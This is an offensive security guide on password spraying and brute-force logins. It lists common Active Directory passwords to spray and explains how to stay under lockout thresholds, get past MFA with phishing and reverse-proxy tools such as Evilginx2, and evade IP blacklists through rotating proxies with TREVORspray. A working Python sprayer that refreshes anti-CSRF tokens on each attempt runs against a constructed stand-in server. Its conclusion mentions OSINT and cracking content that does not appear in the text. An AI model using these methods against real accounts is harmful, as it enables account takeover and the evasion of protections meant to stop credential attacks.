PHISHING and Brute (USEFUL TOOLS AND INFORMATION)



Moshoes
TIPS
What to watch out for

You will undoubtedly encounter some of the following when attempting to log in using brute force or password-spraying methods.

👍 Account Lockout Policies

Before spraying passwords, try to understand the account lockout policy of the targeted service. Take Active Directory as an example. Most domains will have a lockout policy in place with, say, ten invalid login attempts: if a user enters an incorrect password ten times in a row, the account is locked. The lockout duration is 30 minutes by default, so the user cannot log in for that period. Just as important for spraying is the observation window, the period after which the bad-password counter resets (commonly set to the same 30 minutes); that number decides how soon you can safely come back to the same account.

Your best bet in situations like this is to try to spread out your attempts by trying a single password across multiple different account names. Try to use some of the most common passwords used with Active Directory, such as:
👍P@ssw0rd01, Password123, Password1, Hello123, Welcome1/Welcome01
👍$Companyname1
👍Winter2023*, Spring2023!, Summer2023?, Summer2023, July2023! (Depending on the time of year your testing is taking place)

👍 Multi-Factor Authentication

You may also run into a situation where you successfully log in to a service, only to find that the user has MFA (Multi-Factor Authentication) enabled. Where do you go from here? There are a few ways to get past it.

Social Engineering: A well-crafted phishing attack could trick users into providing their MFA token. This method, however, requires timing and precision because MFA tokens usually expire quickly.

Man-in-the-Middle (MitM) Attacks: In this method, you place yourself between the user and the service, typically as a reverse proxy on a look-alike domain. When the user enters their credentials and MFA code, you relay them to the real service and capture the authenticated session cookie it returns, so you never need the code yourself. Evilginx2 (https://github.com/kgretzky/evilginx2) and CredSniper (https://github.com/ustayready/CredSniper) are a couple of tools that can help with this.

👍 CSRF Tokens

In certain situations, you may be up against anti-CSRF tokens when attempting a brute-force attack. A new CSRF token must be fetched from the server for every login attempt, as each token is typically unique per session or request. This effectively means that for each login attempt, we would need to fetch a new login page, parse it to extract the CSRF token, and then use it in the login request.

To overcome this, you can let Burp Suite refresh the token for you (a session handling rule with a macro that fetches the login page before each Intruder request, or Intruder's recursive grep payload that extracts the token from the previous response), or automate the fetch-parse-submit loop in a Python script.
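The fetch-parse-submit loop in code, as an added example that is not part of the original post. The target is a constructed stand-in that issues a single-use token on every GET and rejects any POST that does not present a fresh one; the form field names (`username`, `password`, `csrf_token`) and the status codes are assumptions, and in practice the two server methods would be replaced by real HTTP requests that carry the session cookie along.

```python
"""Added example, not from the original post: spraying a login form that requires a
fresh anti-CSRF token on every attempt. FakeCsrfServer is a constructed stand-in."""
import secrets
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode


class HiddenInputParser(HTMLParser):
    """Collects every <input type="hidden" name=... value=...> on a page."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden" and a.get("name"):
            self.hidden[a["name"]] = a.get("value", "")


def extract_csrf_token(html, field_name="csrf_token"):
    """Pull the anti-CSRF token out of the login form (field name is an assumption)."""
    parser = HiddenInputParser()
    parser.feed(html)
    if field_name not in parser.hidden:
        raise ValueError(f"no hidden field named {field_name!r} in page")
    return parser.hidden[field_name]


def build_login_body(html, username, password, field_name="csrf_token"):
    """Form-encode one login attempt using the token found in `html`."""
    token = extract_csrf_token(html, field_name)
    return urlencode({"username": username, "password": password, field_name: token})


class FakeCsrfServer:
    """Constructed stand-in for the target: each GET issues a one-time token and each
    POST must present a token that was issued and not yet used."""

    PAGE = ('<html><body><form method="post" action="/login">'
            '<input type="text" name="username">'
            '<input type="password" name="password">'
            '<input type="hidden" name="csrf_token" value="{token}">'
            '<button>Login</button></form></body></html>')

    def __init__(self, valid_creds):
        self.valid_creds = valid_creds   # {username: password}, constructed
        self.issued = set()
        self.requests = 0

    def get_login_page(self):
        self.requests += 1
        token = secrets.token_hex(16)
        self.issued.add(token)
        return self.PAGE.format(token=token)

    def post_login(self, body):
        self.requests += 1
        form = {k: v[0] for k, v in parse_qs(body).items()}
        token = form.get("csrf_token")
        if token not in self.issued:
            return 403, "invalid or reused CSRF token"
        self.issued.discard(token)       # tokens are single-use
        if self.valid_creds.get(form.get("username")) == form.get("password"):
            return 302, "login ok"
        return 401, "bad credentials"


def spray_password(server, users, password):
    """One password across many users, fetching a fresh token before every POST."""
    hits = []
    for user in users:
        page = server.get_login_page()
        status, _ = server.post_login(build_login_body(page, user, password))
        if status == 302:
            hits.append(user)
    return hits


if __name__ == "__main__":
    server = FakeCsrfServer({"alice": "Winter2023*"})   # constructed sample account
    print("valid:", spray_password(server, ["bob", "alice", "carol"], "Winter2023*"))
    print("requests issued:", server.requests)          # two per user: GET then POST
```

Note the cost this imposes: every attempt is two requests instead of one, which halves your rate against any request-count throttle and is exactly why Burp's session handling macros exist. Reusing a captured token for a second POST fails with 403 here, which is the behaviour the post describes.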

👍 IP Blacklists

While attempting brute force attacks, you may also be subject to IP blacklisting. IP blacklisting is a security measure that blocks traffic originating from particular IP addresses. Systems may implement this to prevent repeated failed login attempts, indicating a brute force attack.

There are a few ways we can circumvent this. To bypass the blacklist, you can use a proxy server or VPN to change your IP address, utilize cloud-based services, or use virtual machines to test from different IP addresses.

Or use a script like TREVORspray (https://github.com/blacklanternsecurity/TREVORspray) from GitHub.

TREVORspray is a password sprayer that can take advantage of SSH proxying. It logs in to multiple different systems (such as AWS virtual machines, each with a different IP address) and takes turns attacking a password portal from each to avoid blacklisting the IPs because of too many failed attempts in a short period from a single IP.

It supports attacking various services like Office 365, Active Directory Federated Services, Outlook Web App, Okta SSO, and Cisco VPN. It also supports Office 365 MFA bypass.

👍 Conclusion

You should now better understand how to guess a password.

I have walked you through common weak passwords, what parameters must be established before beginning, how to use OSINT to find passwords, different tools used while cracking or brute forcing, and what you need to watch out for when performing attacks.